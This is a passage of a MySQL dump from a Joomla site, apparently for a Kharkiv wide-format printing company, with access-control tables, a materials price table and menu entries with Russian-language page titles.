  `value` varchar(240) NOT NULL DEFAULT '',
  `order_value` int(11) NOT NULL DEFAULT '0',
  `name` varchar(255) NOT NULL DEFAULT '',
  `hidden` int(11) NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  UNIQUE KEY `jos_section_value_value_aro` (`section_value`(100),`value`(100)),
  KEY `jos_gacl_hidden_aro` (`hidden`)
) ENGINE=MyISAM AUTO_INCREMENT=20 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_core_acl_aro`
--

LOCK TABLES `jos_core_acl_aro` WRITE;
/*!40000 ALTER TABLE `jos_core_acl_aro` DISABLE KEYS */;
INSERT INTO `jos_core_acl_aro` VALUES (10,'users','62',0,'Administrator',0),(19,'users','71',0,'Thomas Giron',0);
/*!40000 ALTER TABLE `jos_core_acl_aro` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_core_acl_aro_groups`
--

DROP TABLE IF EXISTS `jos_core_acl_aro_groups`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_core_acl_aro_groups` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `parent_id` int(11) NOT NULL DEFAULT '0',
  `name` varchar(255) NOT NULL DEFAULT '',
  `lft` int(11) NOT NULL DEFAULT '0',
  `rgt` int(11) NOT NULL DEFAULT '0',
  `value` varchar(255) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`),
  KEY `jos_gacl_parent_id_aro_groups` (`parent_id`),
  KEY `jos_gacl_lft_rgt_aro_groups` (`lft`,`rgt`)
) ENGINE=MyISAM AUTO_INCREMENT=31 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_core_acl_aro_groups`
--

LOCK TABLES `jos_core_acl_aro_groups` WRITE;
/*!40000 ALTER TABLE `jos_core_acl_aro_groups` DISABLE KEYS */;
INSERT INTO `jos_core_acl_aro_groups` VALUES (17,0,'ROOT',1,22,'ROOT'),(28,17,'USERS',2,21,'USERS'),(29,28,'Public Frontend',3,12,'Public Frontend'),(18,29,'Registered',4,11,'Registered'),(19,18,'Author',5,10,'Author'),(20,19,'Editor',6,9,'Editor'),(21,20,'Publisher',7,8,'Publisher'),(30,28,'Public Backend',13,20,'Public Backend'),(23,30,'Manager',14,19,'Manager'),(24,23,'Administrator',15,18,'Administrator'),(25,24,'Super Administrator',16,17,'Super Administrator');
/*!40000 ALTER TABLE `jos_core_acl_aro_groups` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_core_acl_aro_map`
--

DROP TABLE IF EXISTS `jos_core_acl_aro_map`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_core_acl_aro_map` (
  `acl_id` int(11) NOT NULL DEFAULT '0',
  `section_value` varchar(230) NOT NULL DEFAULT '0',
  `value` varchar(100) NOT NULL,
  PRIMARY KEY (`acl_id`,`section_value`,`value`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_core_acl_aro_map`
--

LOCK TABLES `jos_core_acl_aro_map` WRITE;
/*!40000 ALTER TABLE `jos_core_acl_aro_map` DISABLE KEYS */;
/*!40000 ALTER TABLE `jos_core_acl_aro_map` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_core_acl_aro_sections`
--

DROP TABLE IF EXISTS `jos_core_acl_aro_sections`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_core_acl_aro_sections` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `value` varchar(230) NOT NULL DEFAULT '',
  `order_value` int(11) NOT NULL DEFAULT '0',
  `name` varchar(230) NOT NULL DEFAULT '',
  `hidden` int(11) NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  UNIQUE KEY `jos_gacl_value_aro_sections` (`value`),
  KEY `jos_gacl_hidden_aro_sections` (`hidden`)
) ENGINE=MyISAM AUTO_INCREMENT=11 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_core_acl_aro_sections`
--

LOCK TABLES `jos_core_acl_aro_sections` WRITE;
/*!40000 ALTER TABLE `jos_core_acl_aro_sections` DISABLE KEYS */;
INSERT INTO `jos_core_acl_aro_sections` VALUES (10,'users',1,'Users',0);
/*!40000 ALTER TABLE `jos_core_acl_aro_sections` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_core_acl_groups_aro_map`
--

DROP TABLE IF EXISTS `jos_core_acl_groups_aro_map`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_core_acl_groups_aro_map` (
  `group_id` int(11) NOT NULL DEFAULT '0',
  `section_value` varchar(240) NOT NULL DEFAULT '',
  `aro_id` int(11) NOT NULL DEFAULT '0',
  UNIQUE KEY `group_id_aro_id_groups_aro_map` (`group_id`,`section_value`,`aro_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_core_acl_groups_aro_map`
--

LOCK TABLES `jos_core_acl_groups_aro_map` WRITE;
/*!40000 ALTER TABLE `jos_core_acl_groups_aro_map` DISABLE KEYS */;
INSERT INTO `jos_core_acl_groups_aro_map` VALUES (18,'',19),(25,'',10);
/*!40000 ALTER TABLE `jos_core_acl_groups_aro_map` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_core_log_items`
--

DROP TABLE IF EXISTS `jos_core_log_items`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_core_log_items` (
  `time_stamp` date NOT NULL DEFAULT '0000-00-00',
  `item_table` varchar(50) NOT NULL DEFAULT '',
  `item_id` int(11) unsigned NOT NULL DEFAULT '0',
  `hits` int(11) unsigned NOT NULL DEFAULT '0'
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_core_log_items`
--

LOCK TABLES `jos_core_log_items` WRITE;
/*!40000 ALTER TABLE `jos_core_log_items` DISABLE KEYS */;
/*!40000 ALTER TABLE `jos_core_log_items` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_core_log_searches`
--

DROP TABLE IF EXISTS `jos_core_log_searches`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_core_log_searches` (
  `search_term` varchar(128) NOT NULL DEFAULT '',
  `hits` int(11) unsigned NOT NULL DEFAULT '0'
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_core_log_searches`
--

LOCK TABLES `jos_core_log_searches` WRITE;
/*!40000 ALTER TABLE `jos_core_log_searches` DISABLE KEYS */;
/*!40000 ALTER TABLE `jos_core_log_searches` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_dlcalculator_material`
--

DROP TABLE IF EXISTS `jos_dlcalculator_material`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_dlcalculator_material` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `name` varchar(255) NOT NULL,
  `sizes` varchar(255) NOT NULL,
  `prices` varchar(255) NOT NULL,
  `sort` int(11) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=5 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_dlcalculator_material`
--

LOCK TABLES `jos_dlcalculator_material` WRITE;
/*!40000 ALTER TABLE `jos_dlcalculator_material` DISABLE KEYS */;
INSERT INTO `jos_dlcalculator_material` VALUES (1,'Самоклеющаяся пленка FotoJet','1.04|1.24|1.48','65|56',1),(2,'Самоклеющаяся пленка перфорированная One Way Vision','1.04|1.24|1.48','107|93',2),(3,'Баннерная ткань ламинированная ','1.05|1.55|2.15|3.15','66|57',3);
/*!40000 ALTER TABLE `jos_dlcalculator_material` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_groups`
--

DROP TABLE IF EXISTS `jos_groups`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_groups` (
  `id` tinyint(3) unsigned NOT NULL DEFAULT '0',
  `name` varchar(50) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_groups`
--

LOCK TABLES `jos_groups` WRITE;
/*!40000 ALTER TABLE `jos_groups` DISABLE KEYS */;
INSERT INTO `jos_groups` VALUES (0,'Public'),(1,'Registered'),(2,'Special');
/*!40000 ALTER TABLE `jos_groups` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_menu`
--

DROP TABLE IF EXISTS `jos_menu`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_menu` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `menutype` varchar(75) DEFAULT NULL,
  `name` varchar(255) DEFAULT NULL,
  `alias` varchar(255) NOT NULL DEFAULT '',
  `link` text,
  `type` varchar(50) NOT NULL DEFAULT '',
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `parent` int(11) unsigned NOT NULL DEFAULT '0',
  `componentid` int(11) unsigned NOT NULL DEFAULT '0',
  `sublevel` int(11) DEFAULT '0',
  `ordering` int(11) DEFAULT '0',
  `checked_out` int(11) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `pollid` int(11) NOT NULL DEFAULT '0',
  `browserNav` tinyint(4) DEFAULT '0',
  `access` tinyint(3) unsigned NOT NULL DEFAULT '0',
  `utaccess` tinyint(3) unsigned NOT NULL DEFAULT '0',
  `params` text NOT NULL,
  `lft` int(11) unsigned NOT NULL DEFAULT '0',
  `rgt` int(11) unsigned NOT NULL DEFAULT '0',
  `home` int(1) unsigned NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  KEY `componentid` (`componentid`,`menutype`,`published`,`access`),
  KEY `menutype` (`menutype`)
) ENGINE=MyISAM AUTO_INCREMENT=30 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_menu`
--

LOCK TABLES `jos_menu` WRITE;
/*!40000 ALTER TABLE `jos_menu` DISABLE KEYS */;
INSERT INTO `jos_menu` VALUES (1,'mainmenu','Главная','home','index.php?option=com_content&view=article&id=4','component',1,0,20,0,1,0,'0000-00-00 00:00:00',0,0,0,3,'show_noauth=0\nshow_title=1\nlink_titles=0\nshow_intro=1\nshow_section=0\nlink_section=0\nshow_category=0\nlink_category=0\nshow_author=1\nshow_create_date=1\nshow_modify_date=1\nshow_item_navigation=0\nshow_readmore=1\nshow_vote=0\nshow_icons=1\nshow_pdf_icon=1\nshow_print_icon=1\nshow_email_icon=1\nshow_hits=1\nfeed_summary=\npage_title=Широкоформатная печать в Харькове — ЭкваторПринт\nshow_page_title=0\npageclass_sfx=\nmenu_image=-1\nsecure=0\n\n',0,0,1),(2,'other-menu','Оборудование','equipment','index.php?option=com_content&view=article&id=1','component',1,0,20,0,1,0,'0000-00-00 00:00:00',0,0,0,0,'show_noauth=\nshow_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_item_navigation=\nshow_readmore=\nshow_vote=\nshow_icons=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nshow_hits=\nfeed_summary=\npage_title=Оборудование. Широкоформатная печать на рулонных материалах Харьков.\nshow_page_title=0\npageclass_sfx=\nmenu_image=-1\nsecure=0\n\n',0,0,0),(3,'mainmenu','Прайс-лист','price','index.php?option=com_content&view=article&id=2','component',1,0,20,0,2,62,'2015-10-20 07:08:25',0,0,0,0,'show_noauth=\nshow_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_item_navigation=\nshow_readmore=\nshow_vote=\nshow_icons=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nshow_hits=\nfeed_summary=\npage_title=Цена на широкоформатную печать \\| прайс\nshow_page_title=0\npageclass_sfx=\nmenu_image=-1\nsecure=0\n\n',0,0,0),(4,'mainmenu','Контакты','contacts','index.php?option=com_content&view=article&id=3','component',1,0,20,0,5,0,'0000-00-00 00:00:00',0,0,0,0,'show_noauth=\nshow_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_item_navigation=\nshow_readmore=\nshow_vote=\nshow_icons=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nshow_hits=\nfeed_summary=\npage_title=Контакты. Широкоформатная печать Харьков, Украина\nshow_page_title=0\npageclass_sfx=\nmenu_image=-1\nsecure=0\n\n',0,0,0),(5,'mainmenu','Обратная связь','2010-11-06-16-50-07','index.php?option=com_contact&view=contact&id=1','component',0,0,7,0,8,0,'0000-00-00 00:00:00',0,0,0,0,'show_contact_list=0\nshow_category_crumb=0\ncontact_icons=\nicon_address=\nicon_email=\nicon_telephone=\nicon_mobile=\nicon_fax=\nicon_misc=\nshow_headings=\nshow_position=\nshow_email=\nshow_telephone=\nshow_mobile=\nshow_fax=\nallow_vcard=\nbanned_email=\nbanned_subject=\nbanned_text=\nvalidate_session=\ncustom_reply=\npage_title=Обратная связь - широкоформатная печать Харьков\nshow_page_title=0\npageclass_sfx=\nmenu_image=-1\nsecure=0\n\n',0,0,0),(19,'dop-menu','Печать бигбордов','print-billboards','index.php?option=com_content&view=article&id=18','component',1,0,20,0,2,62,'2014-01-30 12:22:54',0,0,0,0,'show_noauth=\nshow_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_item_navigation=\nshow_readmore=\nshow_vote=\nshow_icons=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nshow_hits=\nfeed_summary=\npage_title=Печать билбордов \\| бигбордов\nshow_page_title=0\npageclass_sfx=\nmenu_image=-1\nsecure=0\n\n',0,0,0),(6,'mainmenu','Услуги','services','index.php?option=com_content&view=article&id=5','component',0,0,20,0,7,0,'0000-00-00 00:00:00',0,0,0,0,'show_noauth=\nshow_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_item_navigation=\nshow_readmore=\nshow_vote=\nshow_icons=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nshow_hits=\nfeed_summary=\npage_title=Цветная широкоформатная печать баннера билбордов бигбордов на самоклейке на оракале - Харьков\nshow_page_title=0\npageclass_sfx=\nmenu_image=-1\nsecure=0\n\n',0,0,0),(7,'dop-menu','Печать на холсте','printing-on-canvas','index.php?option=com_content&view=article&id=6','component',1,0,20,0,4,62,'2014-03-18 08:10:34',0,0,0,0,'show_noauth=\nshow_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_item_navigation=\nshow_readmore=\nshow_vote=\nshow_icons=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nshow_hits=\nfeed_summary=\npage_title=Печать на холсте Харьков. Печать фото на холсте с натяжкой на подрамник\nshow_page_title=0\npageclass_sfx=\nmenu_image=-1\nsecure=0\n\n',0,0,0),(8,'dop-menu','Печать на виниле','printing-on-vinyl','index.php?option=com_content&view=article&id=7','component',1,0,20,0,3,0,'0000-00-00 00:00:00',0,0,0,0,'show_noauth=\nshow_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_item_navigation=\nshow_readmore=\nshow_vote=\nshow_icons=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nshow_hits=\nfeed_summary=\npage_title=Печать на виниле (пленке), самоклейке (оракале)\nshow_page_title=0\npageclass_sfx=\nmenu_image=-1\nsecure=0\n\n',0,0,0),(9,'dop-menu','Баннер печать','banner-printing','index.php?option=com_content&view=article&id=8','component',1,0,20,0,1,0,'0000-00-00 00:00:00',0,0,0,0,'show_noauth=\nshow_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_item_navigation=\nshow_readmore=\nshow_vote=\nshow_icons=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nshow_hits=\nfeed_summary=\npage_title=Печать на баннере Киев, Харьков + монтаж\nshow_page_title=0\npageclass_sfx=\nmenu_image=-1\nsecure=0\n\n',0,0,0),(10,'dop-menu','Печать на сетке','printing-on-the-grid','index.php?option=com_content&view=article&id=9','component',1,0,20,0,5,0,'0000-00-00 00:00:00',0,0,0,0,'show_noauth=\nshow_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_item_navigation=\nshow_readmore=\nshow_vote=\nshow_icons=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nshow_hits=\nfeed_summary=\npage_title=Сетка банерная - широкоформатная цветная печать на сетке Харьков\nshow_page_title=0\npageclass_sfx=\nmenu_image=-1\nsecure=0\n\n',0,0,0),(11,'dop-menu','Печать фотографий','print-great-photos','index.php?option=com_content&view=article&id=10','component',1,0,20,0,6,0,'0000-00-00 00:00:00',0,0,0,0,'show_noauth=\nshow_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_item_navigation=\nshow_readmore=\nshow_vote=\nshow_icons=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nshow_hits=\nfeed_summary=\npage_title=Печать больших фотографий (больших форматов) - цветная широкоформатная печать Харьков\nshow_page_title=0\npageclass_sfx=\nmenu_image=-1\nsecure=0\n\n',0,0,0),(12,'other-menu','Изготовление рекламы','outdoor-advertising','index.php?option=com_content&view=article&id=11','component',1,0,20,0,2,0,'0000-00-00 00:00:00',0,0,0,0,'show_noauth=\nshow_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_item_navigation=\nshow_readmore=\nshow_vote=\nshow_icons=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nshow_hits=\nfeed_summary=\npage_title=Изготовление наружной рекламы: баннера, вывесок, реклама на билбордах на улицах на магазинах - Харьков\nshow_page_title=0\npageclass_sfx=\nmenu_image=-1\nsecure=0\n\n',0,0,0),(13,'other-menu','Цифровая печать','digital-printing','index.php?option=com_content&view=article&id=12','component',1,0,20,0,3,0,'0000-00-00 00:00:00',0,0,0,0,'show_noauth=\nshow_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_item_navigation=\nshow_readmore=\nshow_vote=\nshow_icons=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nshow_hits=\nfeed_summary=\npage_title=Цифровая печать Харьков - широкоформатная печать в Харькове\nshow_page_title=0\npageclass_sfx=\nmenu_image=-1\nsecure=0\n\n',0,0,0),(14,'dop-menu','Печать фотообоев','print-photo','index.php?option=com_content&view=article&id=13','component',1,0,20,0,7,0,'0000-00-00 00:00:00',0,0,0,0,'show_noauth=\nshow_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_item_navigation=\nshow_readmore=\nshow_vote=\nshow_icons=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nshow_hits=\nfeed_summary=\npage_title=Печать фотообоев - широкофрматная печать в Харькове\nshow_page_title=0\npageclass_sfx=\nmenu_image=-1\nsecure=0\n\n',0,0,0),(15,'dop-menu','Печать флагов','print-flags','index.php?option=com_content&view=article&id=14','component',1,0,20,0,8,62,'2014-09-22 12:12:26',0,0,0,0,'show_noauth=\nshow_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_item_navigation=\nshow_readmore=\nshow_vote=\nshow_icons=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nshow_hits=\nfeed_summary=\npage_title=Флаги - широкоформатная печать флагов Харьков\nshow_page_title=0\npageclass_sfx=\nmenu_image=-1\nsecure=0\n\n',0,0,0),(16,'dop-menu','Печать ситилайтов','print-citylights','index.php?option=com_content&view=article&id=15','component',1,0,20,0,9,62,'2015-01-26 12:46:24',0,0,0,0,'show_noauth=\nshow_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_item_navigation=\nshow_readmore=\nshow_vote=\nshow_icons=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nshow_hits=\nfeed_summary=\npage_title=Печать ситилайтов в Харькове\nshow_page_title=0\npageclass_sfx=\nmenu_image=-1\nsecure=0\n\n',0,0,0),(17,'dop-menu','Печать на потолках','print-ceilings','index.php?option=com_content&view=article&id=16','component',1,0,20,0,10,62,'2014-09-22 12:15:55',0,0,0,0,'show_noauth=\nshow_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_item_navigation=\nshow_readmore=\nshow_vote=\nshow_icons=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nshow_hits=\nfeed_summary=\npage_title=Широкоформатная печать на потолках в Харькове\nshow_page_title=0\npageclass_sfx=\nmenu_image=-1\nsecure=0\n\n',0,0,0),(18,'dop-menu','Печать на тенте','printing-on-an-awning','index.php?option=com_content&view=article&id=17','component',1,0,20,0,11,62,'2014-03-18 08:09:04',0,0,0,0,'show_noauth=\nshow_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_item_navigation=\nshow_readmore=\nshow_vote=\nshow_icons=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nshow_hits=\nfeed_summary=\npage_title=Печать на тенте - широкоформатная печать на брезенте - тент. баннер для машин Харьков\nshow_page_title=0\npageclass_sfx=\nmenu_image=-1\nsecure=0\n\n',0,0,0),(20,'mainmenu','Доставка','delivery','index.php?option=com_content&view=article&id=19','component',1,0,20,0,3,0,'0000-00-00 00:00:00',0,0,0,0,'show_noauth=\nshow_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_item_navigation=\nshow_readmore=\nshow_vote=\nshow_icons=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nshow_hits=\nfeed_summary=\npage_title=Доставка. Широкоформатная печать Харьков, Донецк, Днепропетровск, Запорожье, Одесса, Симферополь\nshow_page_title=0\npageclass_sfx=\nmenu_image=-1\nsecure=0\n\n',0,0,0),(21,'other-menu','Широкоформатная печать в Днепропетровске — ЭкваторПринт','printing-in-dnepropetrovsk','index.php?option=com_content&view=article&id=20','component',1,0,20,0,4,0,'0000-00-00 00:00:00',0,0,0,0,'show_noauth=\nshow_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_item_navigation=\nshow_readmore=\nshow_vote=\nshow_icons=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nshow_hits=\nfeed_summary=\npage_title=\nshow_page_title=1\npageclass_sfx=\nmenu_image=-1\nsecure=0\n\n',0,0,0),(22,'other-menu','Широформатная печать в Одессе — ЭкваторПринт','printing-in-odessa','index.php?option=com_content&view=article&id=21','component',1,0,20,0,5,0,'0000-00-00 00:00:00',0,0,0,0,'show_noauth=\nshow_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_item_navigation=\nshow_readmore=\nshow_vote=\nshow_icons=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nshow_hits=\nfeed_summary=\npage_title=\nshow_page_title=1\npageclass_sfx=\nmenu_image=-1\nsecure=0\n\n',0,0,0),(24,'other-menu','Широкоформатная печать в Запорожье — ЭкваторПринт','printing-in-zaporozhje','index.php?option=com_content&view=article&id=23','component',1,0,20,0,7,0,'0000-00-00 00:00:00',0,0,0,0,'show_noauth=\nshow_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_item_navigation=\nshow_readmore=\nshow_vote=\nshow_icons=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nshow_hits=\nfeed_summary=\npage_title=\nshow_page_title=1\npageclass_sfx=\nmenu_image=-1\nsecure=0\n\n',0,0,0),(23,'other-menu','Широкоформатная печать в Киеве — ЭкваторПринт','printing-in-kyiv','index.php?option=com_content&view=article&id=22','component',1,0,20,0,6,0,'0000-00-00 00:00:00',0,0,0,0,'show_noauth=\nshow_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_item_navigation=\nshow_readmore=\nshow_vote=\nshow_icons=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nshow_hits=\nfeed_summary=\npage_title=\nshow_page_title=1\npageclass_sfx=\nmenu_image=-1\nsecure=0\n\n',0,0,0),(25,'other-menu','Широкоформатная печать в Донецке — ЭкваторПринт','printing-in-doneck','index.php?option=com_content&view=article&id=24','component',1,0,20,0,8,0,'0000-00-00 00:00:00',0,0,0,0,'show_noauth=\nshow_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_item_navigation=\nshow_readmore=\nshow_vote=\nshow_icons=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nshow_hits=\nfeed_summary=\npage_title=\nshow_page_title=1\npageclass_sfx=\nmenu_image=-1\nsecure=0\n\n',0,0,0),(26,'other-menu','Широкоформатная печать в Харькове — ЭкваторПринт','printing-in-kharkov','index.php?option=com_content&view=article&id=25','component',1,0,20,0,9,0,'0000-00-00 00:00:00',0,0,0,0,'show_noauth=\nshow_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_item_navigation=\nshow_readmore=\nshow_vote=\nshow_icons=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nshow_hits=\nfeed_summary=\npage_title=\nshow_page_title=1\npageclass_sfx=\nmenu_image=-1\nsecure=0\n\n',0,0,0),(27,'mainmenu','Портфолио','portfolio','index.php?option=com_phocagallery&view=categories','component',1,0,56,0,4,62,'2015-01-26 06:54:38',0,0,0,0,'image=-1\nimage_align=left\nshow_pagination_categories=0\nshow_pagination_category=1\nshow_pagination_limit_categories=0\nshow_pagination_limit_category=1\ndisplay_cat_name_title=0\ncategories_columns=3\nequal_percentage_width=\ndisplay_image_categories=\ncategories_box_width=\nimage_categories_size=\ncategories_image_ordering=\ncategories_display_avatar=\ndisplay_subcategories=\ndisplay_empty_categories=\nhide_categories=\nshow_categories=\ndisplay_access_category=\ndefault_pagination_categories=\npagination_categories=\nfont_color=\nbackground_color=\nbackground_color_hover=\nimage_background_color=\nimage_background_shadow=\nborder_color=\nborder_color_hover=\nmargin_box=\npadding_box=\ndisplay_new=\ndisplay_hot=\ndisplay_name=\ndisplay_icon_detail=\ndisplay_icon_download=\ndisplay_icon_folder=\nfont_size_name=\nchar_length_name=\ncategory_box_space=\ndisplay_categories_sub=\ndisplay_subcat_page=\ndisplay_category_icon_image=\ncategory_image_ordering=\ndisplay_back_button=\ndisplay_categories_back_button=\ndefault_pagination_category=\npagination_category=\ndisplay_img_desc_box=\nfont_size_img_desc=\nimg_desc_box_height=\nchar_length_img_desc=\ndisplay_categories_cv=\ndisplay_subcat_page_cv=\ndisplay_category_icon_image_cv=\ncategory_image_ordering_cv=\ndisplay_back_button_cv=\ndisplay_categories_back_button_cv=\ncategories_columns_cv=\ndisplay_image_categories_cv=\nimage_categories_size_cv=\ndetail_window=5\ndetail_window_background_color=\nmodal_box_overlay_color=\nmodal_box_overlay_opacity=\nmodal_box_border_color=\nmodal_box_border_width=\nsb_slideshow_delay=\nsb_lang=\nhighslide_class=\nhighslide_opacity=\nhighslide_outline_type=\nhighslide_fullimg=\nhighslide_close_button=\nhighslide_slideshow=\njak_slideshow_delay=\njak_orientation=\njak_description=\njak_description_height=